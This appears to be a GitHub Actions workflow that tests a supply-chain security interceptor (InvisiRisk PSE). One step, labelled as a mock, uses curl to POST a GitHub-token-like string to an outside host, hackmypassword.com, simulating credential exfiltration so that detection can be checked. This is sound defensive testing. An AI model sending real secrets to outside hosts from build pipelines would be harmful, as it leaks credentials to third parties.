name: JS

on:
  workflow_dispatch:

permissions:
  checks: write
  contents: write
  packages: read
  actions: write
env:
  IR_API_URL: "https://app.stage.invisirisk.com"
  IR_APP_TOKEN: ${{ secrets.IR_API_KEY_STAGE }}

jobs:
  sync-and-build:
    runs-on: ubuntu-latest
    name: Sync fork and Run build

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4
          
      - name: Setup PSE
        uses: invisirisk/pse-action@dev-test
        with:
          mode: docker-intercept
          api_url: ${{ env.IR_API_URL }}
          app_token: ${{ env.IR_APP_TOKEN }}

      - name: Use Node.js
        uses: actions/setup-node@v3
        with:
         node-version: "22.11.0"
      - name: Mock API key exposure request
        run: |
          curl -X POST https://hackmypassword.com \
          -H "Content-Type: application/json" \
          -d '{"data":{"GH":"ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"}}'

      # - name: install dependencies
      #   run: npm install --legacy-peer-deps

      - name: Cleanup PSE
        if: always()
        uses: invisirisk/pse-action@dev-test
        with:
          cleanup: "true"

  gather_analytics:
   runs-on: ubuntu-latest
   name: Gather Analytics
   needs: sync-and-build
   if: always()
   steps:
   - name: Gather Status
     uses: invisirisk/pse-action@dev-test
     with:
      api_url: ${{ env.IR_API_URL }}
      app_token: ${{ env.IR_APP_TOKEN }}
      send_job_status: "true"
      debug: "true"
